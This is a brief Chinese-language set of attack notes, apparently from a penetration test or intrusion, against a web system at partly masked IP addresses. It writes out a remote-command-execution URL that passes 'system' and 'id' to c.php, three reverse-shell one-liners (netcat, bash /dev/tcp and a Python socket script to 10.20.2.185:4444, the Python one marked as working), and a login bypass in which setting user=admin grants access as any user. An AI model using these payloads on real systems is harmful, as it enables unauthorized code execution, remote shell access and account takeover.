遠程RCE
https://111.231.xx.xx/tool/log/c.php?strip_slashes=system&host=id
嘗試 彈個shell
nc 10.20.3.129 4444 -e /bin/bash nc嘗試反彈shell失敗了
bash -i >& /dev/tcp/10.20.2.185/4444 0>&1 bash 嘗試反彈shell失敗了
sanqiushu@sanqiushu-VirtualBox:~$ python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.20.2.185',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" python 牛逼
任意用戶登錄:
https://114.119.x.xxx/ui/login.php?user=admin
直接設置user=xxx就可以以xxx的身份登錄系統
